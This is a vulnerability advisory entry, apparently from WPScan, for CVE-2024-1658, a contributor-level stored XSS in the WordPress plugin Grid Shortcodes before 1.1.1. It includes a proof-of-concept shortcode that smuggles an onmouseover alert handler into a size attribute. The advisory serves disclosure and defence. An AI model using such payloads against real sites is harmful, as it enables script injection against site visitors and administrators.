Lucene search
Dmitrii IgnatyevWPVDB-ID:9489925E-5A47-4608-90A2-0139C5E1C43CHistoryFeb 26, 2024 - 12:00 a.m.
Grid Shortcodes < 1.1.1 - Contributor+ Stored XSS
2024-02-2600:00:00
Dmitrii Ignatyev
wpscan.com
1
contributor role xss
grid shortcodes
stored xss
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
PoC
[GDC_row] [GDC_column size=‘" onmouseover=“alert(1123123)”’] Your content here [/GDC_column] [GDC_column size=“third”] Your content here [/GDC_column] [GDC_column size=“third”] Your content here [/GDC_column] [/GDC_row]
Related
cvelist
cvelist
CVE-2024-1658 Grid Shortcodes < 1.1.1 - Contributor+ Stored XSS
2024-03-18 15:15:26
vulnrichment
vulnrichment
CVE-2024-1658 Grid Shortcodes < 1.1.1 - Contributor+ Stored XSS
2024-03-18 15:15:26
cve
cve
CVE-2024-1658
2024-03-18 16:15:07
nvd
nvd
CVE-2024-1658
2024-03-18 16:15:07
wpexploit
wpexploit
Grid Shortcodes < 1.1.1 - Contributor+ Stored XSS
2024-02-26 00:00:00
AI Score
5.7
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPVDB-ID:9489925E-5A47-4608-90A2-0139C5E1C43C